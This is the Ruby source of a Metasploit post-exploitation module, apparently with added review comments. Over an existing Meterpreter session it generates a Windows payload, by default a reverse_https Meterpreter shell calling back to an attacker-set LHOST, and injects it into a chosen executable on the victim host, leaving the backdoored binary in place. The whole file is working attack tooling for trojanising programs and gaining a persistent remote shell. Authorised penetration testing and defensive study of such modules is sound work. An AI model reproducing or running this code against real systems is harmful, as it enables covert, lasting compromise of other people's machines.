GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/manage/peinjector.rb
require 'rex'
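# Post module that hands a generated Windows payload to the Meterpreter
# `peinjector` extension so it can be embedded in an existing executable.
#
# Flow visible in this file: load the extension, check the PAYLOAD name against
# the framework's payload list, build and validate the payload datastore, then
# pass the shellcode and the TARGETPE path to `inject_shellcode`.
#
# NOTE(review): nothing in this file backs up or restores the file named by
# TARGETPE, so whatever the extension writes stays in place after the run.
# Account for that in engagement clean-up; the modified binary is also the
# artifact that file-integrity monitoring would see.
class MetasploitModule < Msf::Post
  include Msf::Post::Common

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Peinjector',
        'Description' => %q{
          This module will inject a specified windows payload into a target executable.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'Maximiliano Tedesco <[email protected]>'],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              peinjector_inject_shellcode
            ]
          }
        }
      )
    )

    register_options(
      [
        OptString.new('PAYLOAD', [false, 'Windows Payload to inject into the target executable.', 'windows/meterpreter/reverse_https']),
        OptAddress.new('LHOST', [true, 'IP of host that will receive the connection from the payload.']),
        OptInt.new('LPORT', [false, 'Port for Payload to connect to.', 4433]),
        # Registered as optional, so `run` has to reject an unset value itself.
        OptString.new('TARGETPE', [false, 'Path of the target executable to be injected']),
        OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format."])
      ]
    )
  end

  # Entry point for the `run` command: validates the options, builds the
  # payload and hands it to #inject_payload. Returns early, after printing an
  # error, when the payload name is not accepted or TARGETPE is unset.
  def run
    session.core.use('peinjector')

    # sysinfo is only on meterpreter sessions
    print_status("Running module against #{sysinfo['Computer']}") unless sysinfo.nil?

    # Check that the payload is a Windows one and on the list.
    # NOTE(review): /windows/ is unanchored, so any refname that merely contains
    # "windows" passes this check - confirm whether only `windows/...` is intended.
    pay_name = datastore['PAYLOAD']
    unless session.framework.payloads.module_refnames.grep(/windows/).include?(pay_name)
      print_error("The payload specified (#{pay_name}) is not valid for this system")
      return
    end

    # TARGETPE is optional at registration time; without this guard a nil path
    # would be passed all the way down to the extension call.
    targetpe = datastore['TARGETPE']
    if targetpe.blank?
      print_error('TARGETPE is not set; specify the path of the executable to be injected')
      return
    end

    payload = create_payload(pay_name, datastore['LHOST'], datastore['LPORT'], datastore['OPTIONS'])
    inject_payload(payload, targetpe)
  end

  # Create a payload given a name, lhost and lport, plus additional options.
  #
  # @param name  [String] payload reference name, passed to `payloads.create`
  # @param lhost [String] value stored as the payload's LHOST
  # @param lport [Integer] value stored as the payload's LPORT
  # @param opts  [String, nil] extra datastore entries in 'opt=val,opt=val' form
  # @return the payload instance, after `options.validate` has run on its datastore
  def create_payload(name, lhost, lport, opts = '')
    pay = client.framework.payloads.create(name)
    pay.datastore['LHOST'] = lhost
    pay.datastore['LPORT'] = lport
    pay.datastore['EXITFUNC'] = 'thread'
    # this is to generate a proper uuid and make the payload to work with the universal handler
    pay.available_space = 1.gigabyte

    unless opts.blank?
      opts.split(',').each do |entry|
        key, val = entry.split('=', 2)
        key = key.to_s.strip
        # An entry without '=' used to store a nil value under that key, and a
        # space after a comma became part of the key name; report it instead.
        if key.empty? || val.nil?
          print_warning("Ignoring malformed entry in OPTIONS: #{entry.inspect}")
          next
        end
        pay.datastore[key] = val
      end
    end

    # Validate the options for the module
    pay.options.validate(pay.datastore)
    pay
  end

  # Generate the payload, wrap it with the extension's add_thread helper for the
  # payload's architecture and ask the extension to inject it into `targetpe`.
  # Failures are reported with print_error and are not re-raised.
  #
  # @param pay      [Object] payload instance returned by #create_payload
  # @param targetpe [String] path of the executable handed to the extension
  def inject_payload(pay, targetpe)
    print_status('Generating payload')
    raw = pay.generate

    is_x64 = pay.arch.join == ARCH_X64
    threaded_shellcode =
      if is_x64
        client.peinjector.add_thread_x64(raw)
      else
        client.peinjector.add_thread_x86(raw)
      end

    param = {
      isx64: is_x64,
      shellcode: threaded_shellcode,
      targetpe: targetpe,
      size: threaded_shellcode.length
    }

    print_status("Injecting #{pay.name} into the executable #{targetpe}")
    client.peinjector.inject_shellcode(param)
    print_good("Successfully injected payload into the executable: #{targetpe}")
  rescue ::StandardError => e
    # StandardError rather than Exception, so an operator interrupt or a process
    # exit is not swallowed here. The message uses `targetpe` directly: the old
    # handler read it from `param`, which is still nil when `pay.generate`
    # raises, so the handler itself failed with NoMethodError.
    print_error("Failed to Inject Payload to executable #{targetpe}!")
    print_error(e.to_s)
  end
end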